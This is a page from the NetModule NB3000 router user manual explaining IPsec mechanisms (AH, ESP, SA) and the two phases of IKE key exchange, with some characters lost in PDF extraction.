Ipsec - NetModule NB3000-Line-Hd User Manual

5.6.2. IPsec

IPsec is a protocol suite for securing IP communications by authenticating and encrypting
each packet of a communication session and thus establishing a secure virtual private net-
work.
IPsec includes various cryptographic protocols and ciphers for key exchange and data en-
cryption and can be seen as one of the strongest VPN technologies in terms of security. It
uses the following mechanisms:
Mechanism Description
AH Authentication Headers (AH) provide connectionless integrity and data origin au-
thentication for IP datagrams and ensure protection against replay attacks.
ESP Encapsulating Security Payloads (ESP) provide con dentiality, data-origin authen-
tication, connectionless integrity, an anti-replay service and limited tra c- ow
con dentiality.
SA Security Associations (SA) provide a secure channel and a bundle of algorithms
that provide the parameters necessary to operate the AH and/or ESP operations.
The Internet Security Association Key Management Protocol (ISAKMP) provides a
framework for authenticated key exchange.
Negotating keys for encryption and authentication is generally done by the Internet Key
Exchange protocol (IKE) which consists of two phases:
Phase Description
IKE IKE authenticates the peer during this phase for setting up an ISAKMP secure as-
sociation. This can be carried out by either using main or aggressive mode. The
phase
main mode approach utilizes the Di e-Hellman key exchange and authentica-
1
tion is always encrypted with the negotiated key.The aggressive mode just uses
hashes of the pre-shared key and therefore represents a less-secure mechanism
which should generally be avoided as it is prone to dictionary attacks.
IKE IKE nally negotiates IPSec SA parameters and keys and sets up matching IPSec
phase SAs in the peers which is required for AH/ESP later on.
2
NB3000-Line-Hd User Manual 4.2
103